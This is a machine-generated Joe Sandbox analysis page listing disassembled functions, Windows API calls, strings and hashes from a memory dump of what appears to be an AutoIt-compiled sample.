Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 05b7e85067b252e059c0113758877b115a2b17dbfee609d10aeb2fff86ce62a7
Instruction ID: a2dbd28e20960890d29170c834ef1f6df479ce46eda7dcb4bdef6eb95d6d9e24
Opcode Fuzzy Hash: 05b7e85067b252e059c0113758877b115a2b17dbfee609d10aeb2fff86ce62a7
Instruction Fuzzy Hash: BD615BB2900218BFDB51DFA4DC48EAE7B79FF08320F118215F919AB2A1D7759945CFA0

Function 00A78FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A790EA
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A790FB
CharNextW.USER32(0000014E), ref: 00A7912A
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A7916B
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A79181
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A79192
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00A791AF
SetWindowTextW.USER32(?,0000014E), ref: 00A791FB
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00A79211
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A79242
_memset.LIBCMT ref: 00A79267
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00A792B0
_memset.LIBCMT ref: 00A7930F
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A79339
SendMessageW.USER32(?,00001074,?,00000001), ref: 00A79391
SendMessageW.USER32(?,0000133D,?,?), ref: 00A7943E
InvalidateRect.USER32(?,00000000,00000001), ref: 00A79460
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A794AA
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A794D7
DrawMenuBar.USER32(?), ref: 00A794E6
SetWindowTextW.USER32(?,0000014E), ref: 00A7950E

Strings

0, xrefs: 00A79478

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 7191d6135dce791f789d48987361e8b4a50ef2537b8f63ca51d3a3d122a7ef98
Instruction ID: 1912b6e61d17dcd33a27c6738e2b6c2bdd29f18f74a71a07d777dbccbc6b87a5
Opcode Fuzzy Hash: 7191d6135dce791f789d48987361e8b4a50ef2537b8f63ca51d3a3d122a7ef98
Instruction Fuzzy Hash: 5CE16D71900219ABDF21DF94CC84EEF7BB8EF09710F10C156FA19AA291D7708A96DF61

Function 00A74ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00A75007
GetDesktopWindow.USER32 ref: 00A7501C
GetWindowRect.USER32(00000000), ref: 00A75023
GetWindowLongW.USER32(?,000000F0), ref: 00A75085
DestroyWindow.USER32(?), ref: 00A750B1
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00A750DA
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A750F8
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00A7511E
SendMessageW.USER32(?,00000421,?,?), ref: 00A75133
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00A75146
IsWindowVisible.USER32(?), ref: 00A75166
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00A75181
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00A75195
GetWindowRect.USER32(?,?), ref: 00A751AD
MonitorFromPoint.USER32(?,?,00000002), ref: 00A751D3
GetMonitorInfoW.USER32(00000000,?), ref: 00A751ED
CopyRect.USER32(?,?), ref: 00A75204
SendMessageW.USER32(?,00000412,00000000), ref: 00A7526F

Strings

tooltips_class32, xrefs: 00A750D3
0, xrefs: 00A74FB2
(, xrefs: 00A751E0

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: fc659eba8ff36f8a2f3cba359ada0aaf38012f4350a2e1983a95964e685cfdeb
Instruction ID: f7126811d2eaef74d8d0b0bd5a451c73dd39978878b9836d93ccee05d4d82435
Opcode Fuzzy Hash: fc659eba8ff36f8a2f3cba359ada0aaf38012f4350a2e1983a95964e685cfdeb
Instruction Fuzzy Hash: 6DB15871A04740AFDB44DF64C844B6BBBE4BF89710F00CA1CF5999B292DBB1E805CB92

Function 00A5498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00A5499C
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00A549C2
_wcscpy.LIBCMT ref: 00A549F0
_wcscmp.LIBCMT ref: 00A549FB
_wcscat.LIBCMT ref: 00A54A11
_wcsstr.LIBCMT ref: 00A54A1C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00A54A38
_wcscat.LIBCMT ref: 00A54A81
_wcscat.LIBCMT ref: 00A54A88
_wcsncpy.LIBCMT ref: 00A54AB3

Strings

\VarFileInfo\Translation, xrefs: 00A54A30
%u.%u.%u.%u, xrefs: 00A54B16
04090000, xrefs: 00A54A6E
DefaultLangCodepage, xrefs: 00A54A9B
StringFileInfo\, xrefs: 00A54A0B

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 0e5ec1706b177a80c6751c49faef4e47a295857ea12eaa6421404cf225f874b4
Instruction ID: 4c2ea7842ed340f520a70a975134412bb6c56a360cb19b180733953335358fa6
Opcode Fuzzy Hash: 0e5ec1706b177a80c6751c49faef4e47a295857ea12eaa6421404cf225f874b4
Instruction Fuzzy Hash: DF41E172A042047AEB10AB648E47FFF7B7CEF49350F00045AFD04A6192EB30DA9697A5

Function 009F2BA9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009F2C8C
GetSystemMetrics.USER32(00000007), ref: 009F2C94
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009F2CBF
GetSystemMetrics.USER32(00000008), ref: 009F2CC7
GetSystemMetrics.USER32(00000004), ref: 009F2CEC
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 009F2D09
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 009F2D19
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 009F2D4C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 009F2D60
GetClientRect.USER32(00000000,000000FF), ref: 009F2D7E
GetStockObject.GDI32(00000011), ref: 009F2D9A
SendMessageW.USER32(00000000,00000030,00000000), ref: 009F2DA5

Part of subcall function 009F2714: GetCursorPos.USER32(?), ref: 009F2727
Part of subcall function 009F2714: ScreenToClient.USER32(00AB77B0,?), ref: 009F2744
Part of subcall function 009F2714: GetAsyncKeyState.USER32(00000001), ref: 009F2769
Part of subcall function 009F2714: GetAsyncKeyState.USER32(00000002), ref: 009F2777

SetTimer.USER32(00000000,00000000,00000028,009F13C7), ref: 009F2DCC

Strings

AutoIt v3 GUI, xrefs: 009F2D44

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 900e00886e1935bf866c8716571e0d0870ed28090d805495a5450e80b7c9abdd
Instruction ID: 2cc2461d5644a81b3d043b5b97f9512925adfbcb85df34507bc1c0ba335a2263
Opcode Fuzzy Hash: 900e00886e1935bf866c8716571e0d0870ed28090d805495a5450e80b7c9abdd
Instruction Fuzzy Hash: FEB13D71A0020A9FDB14DFA8DD59BBE7BB4FB48314F104229FA55E72A0DB74A851CF60

Function 00A10429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00A01821: _memmove.LIBCMT ref: 00A0185B

GetForegroundWindow.USER32(00A80980,?,?,?,?,?), ref: 00A104E3
IsWindow.USER32(?), ref: 00A466BB

Strings

TITLE, xrefs: 00A46650
REGEXPCLASS, xrefs: 00A46506
REGEXPTITLE, xrefs: 00A464B4
LAST, xrefs: 00A46472
HANDLE, xrefs: 00A4649E
ACTIVE, xrefs: 00A46488
ALL, xrefs: 00A46622
CLASS, xrefs: 00A464E5
INSTANCE, xrefs: 00A465FA

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: ee956ca13c842e19c5838bc70670b0f3be9c091f20682edb54307ca51f4e37d7
Instruction ID: 707e6f9afe3cf39b5d2e23c189fdc86e5f50a79d62019cc91368b6a0b3ade5ff
Opcode Fuzzy Hash: ee956ca13c842e19c5838bc70670b0f3be9c091f20682edb54307ca51f4e37d7
Instruction Fuzzy Hash: BED1E334104602DFCB08EF20D6819EAFBB5BF96344F104A29F495875A2DB70F999CB93

Function 00A7441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A744AC
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00A7456C

Strings

SELECT, xrefs: 00A74606
GETSELECTED, xrefs: 00A7469A
GETITEMCOUNT, xrefs: 00A744DE
GETSELECTEDCOUNT, xrefs: 00A7454F
GETTEXT, xrefs: 00A74515
SELECTCLEAR, xrefs: 00A745EB
ISSELECTED, xrefs: 00A74577
SELECTALL, xrefs: 00A745D3
VIEWCHANGE, xrefs: 00A7472B
SELECTINVERT, xrefs: 00A7463C
DESELECT, xrefs: 00A7465A
FINDITEM, xrefs: 00A746DF
GETSUBITEMCOUNT, xrefs: 00A744F7

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: fed1bdac35130afc52c5706cd1a4ed76ae23f1d7508986417b33f3833e81b52e
Instruction ID: 792e97aadf838fa54dabecde34737e78d03a76265e78de3763040a88d2c907ef
Opcode Fuzzy Hash: fed1bdac35130afc52c5706cd1a4ed76ae23f1d7508986417b33f3833e81b52e
Instruction Fuzzy Hash: 25A17B302142059FCB14EF24CD51A7AB3A5BF89314F15C968F99A9B3E2DB70EC05CB51

Function 00A656C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00A656E1
LoadCursorW.USER32(00000000,00007F8A), ref: 00A656EC
LoadCursorW.USER32(00000000,00007F00), ref: 00A656F7
LoadCursorW.USER32(00000000,00007F03), ref: 00A65702
LoadCursorW.USER32(00000000,00007F8B), ref: 00A6570D
LoadCursorW.USER32(00000000,00007F01), ref: 00A65718
LoadCursorW.USER32(00000000,00007F81), ref: 00A65723
LoadCursorW.USER32(00000000,00007F88), ref: 00A6572E
LoadCursorW.USER32(00000000,00007F80), ref: 00A65739
LoadCursorW.USER32(00000000,00007F86), ref: 00A65744
LoadCursorW.USER32(00000000,00007F83), ref: 00A6574F
LoadCursorW.USER32(00000000,00007F85), ref: 00A6575A
LoadCursorW.USER32(00000000,00007F82), ref: 00A65765
LoadCursorW.USER32(00000000,00007F84), ref: 00A65770
LoadCursorW.USER32(00000000,00007F04), ref: 00A6577B
LoadCursorW.USER32(00000000,00007F02), ref: 00A65786
GetCursorInfo.USER32(?), ref: 00A65796
GetLastError.KERNEL32(00000001,00000000), ref: 00A657C1

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 2e4f636d42b7ca5017d5429fed756bf894d7105053122699e7794e31ecf664b7
Instruction ID: e039e1fee453205c6d78f0fb3ed3856906bc905d003eec13d4cc45d1995927fc
Opcode Fuzzy Hash: 2e4f636d42b7ca5017d5429fed756bf894d7105053122699e7794e31ecf664b7
Instruction Fuzzy Hash: 21415270E44319AADB109FBA8C49D6EFEF8EF51B10F10452FE519E7290DAB8A401CF51

Function 00A4B13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00A4B17B
__swprintf.LIBCMT ref: 00A4B21C
_wcscmp.LIBCMT ref: 00A4B22F
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00A4B284
_wcscmp.LIBCMT ref: 00A4B2C0
GetClassNameW.USER32(?,?,00000400), ref: 00A4B2F7
GetDlgCtrlID.USER32(?), ref: 00A4B349
GetWindowRect.USER32(?,?), ref: 00A4B37F
GetParent.USER32(?), ref: 00A4B39D
ScreenToClient.USER32(00000000), ref: 00A4B3A4
GetClassNameW.USER32(?,?,00000100), ref: 00A4B41E
_wcscmp.LIBCMT ref: 00A4B432
GetWindowTextW.USER32(?,?,00000400), ref: 00A4B458
_wcscmp.LIBCMT ref: 00A4B46C

Part of subcall function 00A1385C: _iswctype.LIBCMT ref: 00A13864

Strings

%s%u, xrefs: 00A4B216

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: db5639ade9a7882d4beb2adfe9ebb35ee4bd3c07e973502eaf001ded82fdc894
Instruction ID: 401bed6d481930932b98c3c8a0e26d9cc09ecb53240bda1f4bff9be4e789cd72
Opcode Fuzzy Hash: db5639ade9a7882d4beb2adfe9ebb35ee4bd3c07e973502eaf001ded82fdc894
Instruction Fuzzy Hash: 84A1E175214306AFDB14DF64C884FEAB7E8FF88354F108629F999C2191D770E956CBA0

Function 00A4BA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00A4BAB1
_wcscmp.LIBCMT ref: 00A4BAC2
GetWindowTextW.USER32(00000001,?,00000400), ref: 00A4BAEA
CharUpperBuffW.USER32(?,00000000), ref: 00A4BB07
_wcscmp.LIBCMT ref: 00A4BB25
_wcsstr.LIBCMT ref: 00A4BB36
GetClassNameW.USER32(00000018,?,00000400), ref: 00A4BB6E
_wcscmp.LIBCMT ref: 00A4BB7E
GetWindowTextW.USER32(00000002,?,00000400), ref: 00A4BBA5
GetClassNameW.USER32(00000018,?,00000400), ref: 00A4BBEE
_wcscmp.LIBCMT ref: 00A4BBFE
GetClassNameW.USER32(00000010,?,00000400), ref: 00A4BC26
GetWindowRect.USER32(00000004,?), ref: 00A4BC8F

Strings

ThumbnailClass, xrefs: 00A4BB79, 00A4BBF9
@, xrefs: 00A4BA92

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 864db590cb56ac4d6c2023093e47d3bf5d9f972c4e10c70385d8487e8e58791c
Instruction ID: 7c0023bfb5d8ccf5d9d66c4c40db0e22910acd966da95db64268bb4330553626
Opcode Fuzzy Hash: 864db590cb56ac4d6c2023093e47d3bf5d9f972c4e10c70385d8487e8e58791c
Instruction Fuzzy Hash: A8819D750182099FDB04DF54C9C5FAA7BE8FF88314F048569FD898A096EB34DD4ACB61

Function 00A4B8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00A4B915

Strings

[ACTIVE, xrefs: 00A4B902
[LAST, xrefs: 00A4B9C2
LAST, xrefs: 00A4B8DA
CLASSNAME=, xrefs: 00A4B952
HANDLE=, xrefs: 00A4B90E
ACTIVE, xrefs: 00A4B8F0
ALL, xrefs: 00A4B9A9
[HANDLE:, xrefs: 00A4B921
[REGEXPTITLE:, xrefs: 00A4B93D
[CLASS:, xrefs: 00A4B965
[ALL, xrefs: 00A4B9BB
REGEXP=, xrefs: 00A4B92A

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: b7efdf3b61159e00b069b75407db942200168aa96971d406137fadcdba245988
Instruction ID: a73f853a355b6c76bcfdbd13d6b83489bb62724f1d7eeaaaf130e7c5fbc5a497
Opcode Fuzzy Hash: b7efdf3b61159e00b069b75407db942200168aa96971d406137fadcdba245988
Instruction Fuzzy Hash: 8C31A035A44209B6DF14EFA0DE43EEE73B8AF21750F600525F541B20D2EF65AE04CA62

Function 00A4CB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00A4CBAA
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00A4CBBC
SetWindowTextW.USER32(?,?), ref: 00A4CBD3
GetDlgItem.USER32(?,000003EA), ref: 00A4CBE8
SetWindowTextW.USER32(00000000,?), ref: 00A4CBEE
GetDlgItem.USER32(?,000003E9), ref: 00A4CBFE
SetWindowTextW.USER32(00000000,?), ref: 00A4CC04
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00A4CC25
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00A4CC3F
GetWindowRect.USER32(?,?), ref: 00A4CC48
SetWindowTextW.USER32(?,?), ref: 00A4CCB3
GetDesktopWindow.USER32 ref: 00A4CCB9
GetWindowRect.USER32(00000000), ref: 00A4CCC0
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00A4CD0C
GetClientRect.USER32(?,?), ref: 00A4CD19
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00A4CD3E
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00A4CD69

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 4e33676686c32c5f0ac28617326bd73c98db42290cdd9d23ba6b4aa3fc4b326f
Instruction ID: 79e0c43a57efeb64f2833c5224c9dd571db19b29ba929ae83ad620715ae0a3b4
Opcode Fuzzy Hash: 4e33676686c32c5f0ac28617326bd73c98db42290cdd9d23ba6b4aa3fc4b326f
Instruction Fuzzy Hash: C251BF34900709EFDB60DFA8CE89F6EBBF5FF44714F000928E18AA25A0D774A815CB10

Function 00A7A7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A7A87E
DestroyWindow.USER32(00000000,?), ref: 00A7A8F8

Part of subcall function 00A01821: _memmove.LIBCMT ref: 00A0185B

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00A7A972
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A7A994
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A7A9A7
DestroyWindow.USER32(00000000), ref: 00A7A9C9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,009F0000,00000000), ref: 00A7AA00
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A7AA19
GetDesktopWindow.USER32 ref: 00A7AA32
GetWindowRect.USER32(00000000), ref: 00A7AA39
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A7AA51
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A7AA69

Part of subcall function 009F29AB: GetWindowLongW.USER32(?,000000EB), ref: 009F29BC

Strings

tooltips_class32, xrefs: 00A7A96B, 00A7A9F9
0, xrefs: 00A7A894

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
